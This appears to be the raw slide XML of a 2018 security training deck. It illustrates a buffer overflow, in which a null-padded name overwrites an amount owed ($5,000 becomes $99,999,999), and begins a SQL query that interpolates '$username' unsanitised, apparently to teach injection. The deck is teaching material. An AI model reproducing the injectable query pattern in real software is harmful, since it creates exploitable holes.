          <p:cNvPr id="2453" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1232677" y="8490339"/>
          <a:ext cx="22271843" cy="2730464"/>
        </p:xfrm>
        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="0" firstRow="1" lastCol="0" lastRow="0" bandCol="0" bandRow="1" rtl="0">
                <a:tableStyleId>{C7B018BB-80A7-4F77-B60F-C8B233D01FF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10505496"/>
                <a:gridCol w="11766346"/>
              </a:tblGrid>
              <a:tr h="910154">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Amount Owed</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="910154">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Rich Adams</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>$5,000.00</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="910154">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2454" name="Rich Adams\00\00\00\00\00\00\00\00\00\00$99,999,999.00"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6449911" y="10396916"/>
            <a:ext cx="12128947" cy="688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3600">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Rich Adams</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\00\00\00\00\00\00\00\00\00\00</a:t>
            </a:r>
            <a:r>
              <a:t>$99,999,999.00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2455" name="This is a contrived example just to demonstrate the principle."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879779" y="12490960"/>
            <a:ext cx="6974508" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This is a contrived example just to demonstrate the principle.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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59" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8661066" y="1233312"/>
            <a:ext cx="7061869" cy="12011715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2460"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246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462" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2463" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2464" name="https://arstechnica.com/.../how-security-flaws-work-the-buffer-overflow/"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://arstechnica.com/.../how-security-flaws-work-the-buffer-overflow/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2465" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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69"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470"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471" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2472" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2473" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2474" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8661285" y="1234057"/>
            <a:ext cx="7061430" cy="12010970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2475" name="https://arstechnica.com/.../how-security-flaws-work-the-buffer-overflow/"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="38D142"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://arstechnica.com/.../how-security-flaws-work-the-buffer-overflow/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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9"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480"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481" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2482" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2483" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2484" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8634944" y="1223449"/>
            <a:ext cx="7123814" cy="13119692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2485" name="https://arstechnica.com/.../how-security-flaws-work-the-buffer-overflow/"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="38D142"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://arstechnica.com/.../how-security-flaws-work-the-buffer-overflow/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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9" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6471641" y="1241680"/>
            <a:ext cx="9267570" cy="12048498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2490"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249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492" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2493" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2494" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2495" name="https://arstechnica.com/.../how-security-flaws-work-the-buffer-overflow/"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="38D142"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://arstechnica.com/.../how-security-flaws-work-the-buffer-overflow/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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9" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-35764" y="-42068"/>
            <a:ext cx="24384001" cy="13800136"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2500" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826370" y="1786724"/>
            <a:ext cx="19690979" cy="10142552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2501"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2502"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503" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2504"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3"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374"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375" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-129782" y="6612198"/>
            <a:ext cx="24643564" cy="4814960"/>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378" name="SELECT *…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6565949" y="6979740"/>
            <a:ext cx="9345390" cy="4079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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  u.username='</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>$username</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
